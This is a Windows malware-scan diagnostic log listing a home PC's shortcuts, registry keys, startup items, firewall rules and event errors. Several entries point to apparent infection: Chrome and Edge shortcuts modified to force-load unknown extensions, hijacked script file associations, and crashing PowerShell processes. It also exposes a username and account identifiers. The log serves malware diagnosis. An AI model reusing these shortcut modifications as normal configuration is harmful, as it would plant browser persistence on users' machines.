ShortcutWithArgument: C:\Users\Woytman\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\Vojtěch - Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC) -> -–disable-features=RendererCodeIntegrity --profile-directory="Profile 2"
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Default" --load-extension="C:\Users\Woytman\klkcjajbnhfgbomfdfpaojadidaapeni"
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (Microsoft Corporation) -> --load-extension="C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extension\obqblkomnklreiemkjpqnkclimqrclbb\2.8.9._0"

==================== Loaded Modules (Whitelisted) =============

2022-06-25 12:05 - 2022-06-15 14:00 - 000094720 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2017-11-01 19:58 - 2017-11-01 19:58 - 001141248 _____ (Robert Simpson, et al.) [File not signed] C:\Program Files (x86)\Adguard\SQLite.Interop.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Users\Public\DRM:احتضان [48]

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BFE => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\camsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\lfsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MpsSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\semgrsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SharedAccess => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\shellhwdetection => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TokenBroker => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WSService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\camsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\lfsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SamSs => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\semgrsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\shellhwdetection => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv2 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srvnet => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TokenBroker => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WSService => ""="Service"

==================== Association (Whitelisted) =================

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\regfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.reg: regfile => <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\batfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.bat: batfile => <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\cmdfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.cmd: cmdfile => <==== ATTENTION

==================== Internet Explorer (Whitelisted) ==========

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\localhost -> localhost

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2022-09-15 22:37 - 2022-09-15 22:37 - 000000855 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 localhost

2020-12-31 16:28 - 2020-09-26 22:55 - 000000407 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Razer Chroma SDK\bin;C:\Program Files\Razer Chroma SDK\bin;C:\Program Files (x86)\Razer\ChromaBroadcast\bin;C:\Program Files\Razer\ChromaBroadcast\bin;c:\windows\system32;c:\windows;c:\windows\system32\wbem;c:\program files (x86)\common files\oracle\java\javapath;c:\windows\system32\windowspowershell\v1.0;c:\windows\system32\openssh;c:\users\woytman\appdata\local\microsoft\windowsapps;c:\adb;c:\program files\intel\wifi\bin;c:\program files\common files\intel\wirelesscommon;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\dotnet;C:\Program Files\dotnet\
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.10.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

MSCONFIG\Services: AdobeARMservice => 3
MSCONFIG\Services: AGMService => 3
MSCONFIG\Services: AGSService => 3
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: cphs => 3
MSCONFIG\Services: cplspcon => 2
MSCONFIG\Services: Disc Soft Pro Bus Service => 3
MSCONFIG\Services: EasyAntiCheat => 3
MSCONFIG\Services: EvtEng => 2
MSCONFIG\Services: FvSvc => 3
MSCONFIG\Services: GalaxyCommunication => 3
MSCONFIG\Services: GoogleChromeElevationService => 3
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: igccservice => 2
MSCONFIG\Services: igfxCUIService2.0.0.0 => 2
MSCONFIG\Services: Intel(R) Capability Licensing Service TCP IP Interface => 3
MSCONFIG\Services: jhi_service => 3
MSCONFIG\Services: LGHUBUpdaterService => 2
MSCONFIG\Services: Micro Star SCM => 2
MSCONFIG\Services: MSI Foundation Service => 3
MSCONFIG\Services: MyWiFiDHCPDNS => 3
MSCONFIG\Services: NvContainerLocalSystem => 3
MSCONFIG\Services: NVDisplay.ContainerLocalSystem => 2
MSCONFIG\Services: RegSrvc => 2
MSCONFIG\Services: Rockstar Service => 3
MSCONFIG\Services: RtkAudioUniversalService => 3
MSCONFIG\Services: Sendevsvc => 3
MSCONFIG\Services: sshd => 3
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: tmInstall => 3
MSCONFIG\Services: ZeroConfigService => 3
HKLM\...\StartupApproved\StartupFolder: => "errorlog.txt"
HKLM\...\StartupApproved\StartupFolder: => "FxSound.lnk"
HKLM\...\StartupApproved\StartupFolder: => "AnyDesk.lnk"
HKLM\...\StartupApproved\Run: => "WindowsDefender"
HKLM\...\StartupApproved\Run: => "XMouseButtonControl"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "RtkAudUService"
HKLM\...\StartupApproved\Run: => "THX0520Helper"
HKLM\...\StartupApproved\Run: => "THX22adHelper"
HKLM\...\StartupApproved\Run: => "RZTHXHelper"
HKLM\...\StartupApproved\Run: => "AdobePSE20AutoAnalyzer"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "Acrobat Assistant 8.0"
HKLM\...\StartupApproved\Run32: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run32: => "haleng"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "WSHelperSetup.exe"
HKLM\...\StartupApproved\Run32: => "Adguard"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\StartupFolder: => "RT-Updater-SVO.lnk"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\StartupFolder: => "Dragon Center.lnk"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\StartupFolder: => "DeepL.lnk"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\StartupFolder: => "DeepL auto-start.lnk"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "uTorrent"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "DAEMON Tools Pro Agent"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "Overwolf"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "Facebook.MessengerDesktop"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "com.blitz.app"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "WSHelperSetup.exe"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "LGHUB"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "Battle.net"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "EpicGamesLauncher"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "GogGalaxy"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "CCleaner Smart Cleaning"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "DeepL"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "Skype for Desktop"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "MicrosoftEdgeAutoLaunch_211F9FEB1C1D0C6ED6DD47C70C7E0A4C"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "RzAppEngine"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "Microsoft Edge Update"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "NoxMultiPlayer"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "GalaxyClient"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{F594DB9B-3374-4F7C-90CD-532C3E7E5764}C:\program files\google\chrome\application\chrome.exe] => (Allow) C:\program files\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [UDP Query User{D4B527AA-C6C5-4F11-A8B0-E8AC3BF22320}C:\program files\google\chrome\application\chrome.exe] => (Allow) C:\program files\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [TCP Query User{14566B2B-20A7-4B78-A626-38B6A3B8BB76}C:\program files\qbittorrent\qbittorrent.exe] => (Allow) C:\program files\qbittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [UDP Query User{FC7A9006-89C7-4AAA-9E4F-2E3C28605BA7}C:\program files\qbittorrent\qbittorrent.exe] => (Allow) C:\program files\qbittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [TCP Query User{99B1B6AC-6C75-4CB7-865B-5610998128DB}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [UDP Query User{A1A20F6B-F39A-49A7-A8E4-1290279A8326}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{05C699F8-CBA4-4162-91B5-0CC46016C276}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{25EFB1EB-F125-4B2D-B704-6F27D7DE6ADB}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{DEB07D98-BC86-4F3A-A47E-D70476D75B67}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Mad Games Tycoon 2\Mad Games Tycoon 2.exe () [File not signed]
FirewallRules: [{975C8F3D-FC40-4B85-B190-52CE9C129C71}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Mad Games Tycoon 2\Mad Games Tycoon 2.exe () [File not signed]
FirewallRules: [{6BBBEC89-4A6A-4E65-BCF7-1F063AE5F7FD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\iVRy\bin\win64\StartSteamVR.exe (Ian Dean -> Mediator Software)
FirewallRules: [{4DB5FAFD-BD78-4C87-A5F1-0207D34AE764}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\iVRy\bin\win64\StartSteamVR.exe (Ian Dean -> Mediator Software)
FirewallRules: [{FFBC2101-1909-413D-97E5-1BF627F8E1E9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\bin\win32\vrstartup.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{C4DDD45F-694D-4465-80B9-F82CEDE09E68}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\bin\win32\vrstartup.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{17D0CB48-13E3-4C39-84EC-5B3EB2860C98}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\MrPrepper\MrPrepper.exe () [File not signed]
FirewallRules: [{5FB62808-6CC0-47E7-9AF7-7D2A08B0B797}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\MrPrepper\MrPrepper.exe () [File not signed]
FirewallRules: [{9C88F60B-0122-4BB3-8EF8-46DDDE3E72E4}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel Corporation -> )
FirewallRules: [{896A80E7-AC26-4FF4-A393-1CF45B29E436}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [{AE818E9B-7552-419A-BA6A-30D476C6AA9E}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [{852BB5DE-0610-465B-8A4A-E5728564D9F7}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{697F38B8-732E-4F57-BB19-8DDF021C511F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{4EF2D863-21B4-4A9E-9A39-6528E150AA0A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{14BB8456-A4E4-4AFC-B865-B3BFF6CDC0D2}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{3E0CB873-4AEE-4794-8D37-2E26B0E2CC49}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PC Building Simulator\PCBS.exe () [File not signed]
FirewallRules: [{2DB81B19-7A5C-4154-B86A-BE6B36294237}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PC Building Simulator\PCBS.exe () [File not signed]
FirewallRules: [{81453AAC-6B6C-483A-9C9B-E2522A4F7D59}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{9009E995-2EF7-47CC-A027-8BCD7F6BA349}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{010F048D-D6BE-4CFC-8AAB-515074264647}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{248C70CB-A9D0-4E9B-83B1-C379E462EEC9}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{CD0F34CF-5006-409B-AE54-C4722C7EF989}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{06C36938-30B6-4146-ACDE-EC997D340EED}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{D47B83AF-F511-400C-8E16-0E061855251B}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{9FABF0F4-CFC8-4AA6-B4C5-40F9600BEC75}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{0C78EFB9-B7D3-4B28-B62C-883B5ADDAD19}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CookingSimulator\CookingSim.exe () [File not signed]
FirewallRules: [{E1F2FFC3-2FEA-492B-B6A9-C515C4BA0A1C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CookingSimulator\CookingSim.exe () [File not signed]
FirewallRules: [{395B3311-5A73-4561-9758-481CD398A729}] => (Block) PCBS.exe => No File
FirewallRules: [{F9E78C50-FF78-4EA3-8EC0-2081CB5F35C7}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{9DADCF0C-C503-4C11-A789-B1266526BB6A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{BFA2B326-B392-41D0-88E8-0ABE54A6B925}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{579A8EE3-B1AA-452F-A197-CD4300A23E07}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{40C1C7F6-512A-4A4E-A4B2-29F15EE259E8}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{86A1097D-D5AD-4D45-897A-1735C2318FC9}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\107.0.1418.35\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation)

==================== Restore Points =========================

22-10-2022 18:02:43 Nainstalováno rozhraní DirectX
01-11-2022 00:31:59 Naplánovaný kontrolní bod
05-11-2022 01:08:38 Installed SeoTools for Excel
05-11-2022 01:28:26 Installed SeoTools for Excel

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (11/07/2022 10:37:31 PM) (Source: .NET Runtime) (EventID: 1023) (User: )
Description: Description: A .NET Core application failed.
Application: CefSharp.BrowserSubprocess.exe
Path: C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.exe
Message: Cannot use file stream for [C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.deps.json]: No such file or directory

Error: (11/07/2022 10:26:47 PM) (Source: .NET Runtime) (EventID: 1023) (User: )
Description: Description: A .NET Core application failed.
Application: CefSharp.BrowserSubprocess.exe
Path: C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.exe
Message: Cannot use file stream for [C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.deps.json]: No such file or directory

Error: (11/07/2022 10:26:47 PM) (Source: .NET Runtime) (EventID: 1023) (User: )
Description: Description: A .NET Core application failed.
Application: CefSharp.BrowserSubprocess.exe
Path: C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.exe
Message: Cannot use file stream for [C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.deps.json]: No such file or directory

Error: (11/07/2022 10:26:46 PM) (Source: .NET Runtime) (EventID: 1023) (User: )
Description: Description: A .NET Core application failed.
Application: CefSharp.BrowserSubprocess.exe
Path: C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.exe
Message: Cannot use file stream for [C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.deps.json]: No such file or directory

Error: (11/07/2022 10:26:46 PM) (Source: .NET Runtime) (EventID: 1023) (User: )
Description: Description: A .NET Core application failed.
Application: CefSharp.BrowserSubprocess.exe
Path: C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.exe
Message: Cannot use file stream for [C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.deps.json]: No such file or directory

Error: (11/07/2022 10:03:27 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplikace: powershell.exe
Verze Framework: v4.0.30319
Popis: Proces byl ukončen z důvodu neošetřené výjimky.
Informace o výjimce: System.AccessViolationException
na Class_43d8b462495a4cbea473abce6dac8229.DispatchMessage(MSG ByRef)
na Class_43d8b462495a4cbea473abce6dac8229.Run()
na System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
na System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
na System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
na System.Threading.ThreadHelper.ThreadStart()

Error: (11/07/2022 10:01:43 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplikace: powershell.exe
Verze Framework: v4.0.30319
Popis: Proces byl ukončen z důvodu neošetřené výjimky.
Informace o výjimce: System.AccessViolationException
na Class_43d8b462495a4cbea473abce6dac8229.DispatchMessage(MSG ByRef)
na Class_43d8b462495a4cbea473abce6dac8229.Run()
na System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
na System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
na System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
na System.Threading.ThreadHelper.ThreadStart()

Error: (11/07/2022 10:00:00 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplikace: powershell.exe
Verze Framework: v4.0.30319
Popis: Proces byl ukončen z důvodu neošetřené výjimky.
Informace o výjimce: System.AccessViolationException
na Class_43d8b462495a4cbea473abce6dac8229.DispatchMessage(MSG ByRef)
na Class_43d8b462495a4cbea473abce6dac8229.Run()
na System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
na System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
na System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
na System.Threading.ThreadHelper.ThreadStart()


System errors:
=============
Error: (11/07/2022 05:09:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Služba Browser neuspěla při spuštění v důsledku následující chyby:
Služba neodpověděla na řídicí nebo zahajovací požadavek dostatečně včas.

